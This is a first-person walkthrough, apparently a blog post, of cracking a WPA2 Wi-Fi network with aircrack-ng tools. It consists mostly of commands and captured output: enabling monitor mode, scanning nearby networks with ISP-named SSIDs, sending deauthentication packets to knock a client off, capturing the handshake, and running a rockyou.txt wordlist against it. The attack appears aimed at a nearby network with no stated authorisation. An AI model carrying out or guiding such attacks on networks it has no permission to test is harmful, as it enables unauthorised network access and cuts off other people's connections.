Starting a USB wireless interface in monitor mode.
┌─[root@parrot]─[/home/jason] └──╼ #airmon-ng start wlan1 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 593 NetworkManager 749 wpa_supplicant 923 dhclient PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01) phy1 wlan1 rt73usb Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W] (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon) (mac80211 station mode vif disabled for [phy1]wlan1) |
Now we need to list all wireless networks to find the one we wish to attack.
┌─[root@parrot]─[/home/jason/Documents] └──╼ #airodump-ng wlan1mon |
I got this output.
CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:25:00:FF:94:73 -1 0 0 0 -1 -1 <length: 0> E0:B9:E5:B8:31:BB -39 30 0 0 11 54e WPA2 CCMP PSK OPTUSVD3AEDEA E0:B9:E5:6E:D3:69 -77 29 0 0 6 54e WPA2 CCMP PSK Telstra6ED369 F4:6B:EF:B8:E9:27 -78 17 0 0 11 54e WPA2 CCMP PSK OPTUS_B8E926 FA:AB:05:CF:98:E2 -85 2 0 0 6 54e OPN Telstra Air BSSID STATION PWR Rate Lost Frames Probe 00:25:00:FF:94:73 82:FC:02:C5:6D:52 -79 0 -12 0 10 F4:6B:EF:B8:E9:27 A0:2C:36:E3:CD:C1 -81 0 - 1 0 8 F4:6B:EF:B8:E9:27 F0:C7:7F:78:19:D5 -83 0 - 1 0 1 |
Select a wireless network access point MAC address and then we are ready to begin attacking the access point.
┌─[root@parrot]─[/home/user] └──╼ #airodump-ng --bssid E0:B9:E5:6E:D3:69 -c 6 --write password wlan1mon |
CH 6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E0:B9:E5:6E:D3:69 -77 100 2540 137 0 6 54e WPA2 CCMP PSK Telstra6ED369 BSSID STATION PWR Rate Lost Frames Probe E0:B9:E5:6E:D3:69 68:64:4B:2A:10:18 -83 2e- 1 0 1600 |
There are clients on the wireless network, we can begin to assist the attack by kicking off a client.
Sending a deauth in a separate terminal window to a wireless client to disconnect them and capture a WPA handshake.
┌─[root@parrot]─[/home/jason] └──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon 08:19:14 Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6 08:19:14 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs] 08:19:15 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs] 08:19:16 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs] 08:19:16 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs] 08:19:17 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs] 08:19:17 Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs] |
The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.
Now I am trying to crack the wireless Pre Shared Key with a wordlist.
┌─[root@parrot]─[/home/jason] └──╼ #aircrack-ng password-01.cap -w rockyou.txt |
This is what it looks like. But the passkey needs to be in the wordlist to crack it.
Aircrack-ng 1.2 rc4 [00:00:27] 45676/9822768 keys tested (1715.21 k/s) Time left: 1 hour, 35 minutes, 0 seconds 0.47% Current passphrase: lovinhim1 Master Key : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37 A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04 Transient Key : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80 65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41 EAPOL HMAC : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39 |
This attack will work once a client is successfully kicked off the network, then they will reconnect to it and the handshake can be captured to a file automatically. This is a great way to crack a wireless network, but the only hard part is cracking the Pre Shared Key. That requires a massive wordlist that can be used against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, then the Pre Shared Key can be cracked.